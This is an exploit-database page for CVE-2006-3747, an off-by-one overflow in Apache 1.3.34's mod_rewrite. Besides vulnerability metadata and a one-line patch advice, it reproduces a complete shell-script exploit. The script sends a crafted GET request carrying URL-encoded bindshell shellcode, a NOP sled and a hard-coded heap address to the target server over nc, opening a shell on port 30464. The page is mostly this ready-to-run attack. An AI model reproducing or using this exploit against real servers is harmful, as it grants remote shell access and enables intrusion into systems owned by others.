header-logo
Suggest Exploit
vendor:
Apache HTTP Server
by:
jack
7,5
CVSS
HIGH
mod_rewrite off-by-one
119
CWE
Product Name: Apache HTTP Server
Affected Version From: Apache 1.3.34
Affected Version To: Apache 1.3.34
Patch Exists: YES
Related CWE: CVE-2006-3747
CPE: a:apache:http_server:1.3.34
Metasploit: https://www.rapid7.com/db/vulnerabilities/http-apache-mod-rewrite-bof/https://www.rapid7.com/db/vulnerabilities/suse-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/freebsd-vid-dc8c08c7-1e7c-11db-88cf-000c6ec775d9/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/apache-httpd-2_2_x-mod_rewrite-off-by-one-error-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-mod_rewrite-off-by-one-error-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/apple-osx-apache-cve-2006-3747/https://www.rapid7.com/db/vulnerabilities/hpsmh-cve-2006-3747/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006

Exploit for Apache mod_rewrite off-by-one

This exploit is for Apache mod_rewrite off-by-one vulnerability discovered by Mark Dowd. It is a shellcode based on Taeho Oh bindshell on port 30464 and modified for avoiding apache url-escape. The shellcode address in heap memory on apache 1.3.34 (debian sarge) is at 0x0834ae77 for any other version/system.

Mitigation:

Apache should be updated to the latest version to patch this vulnerability.
Source

Exploit-DB raw data:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# 
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo    "by jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

# milw0rm.com [2006-08-21]

Navigation

Suggest Exploit

Services By CQR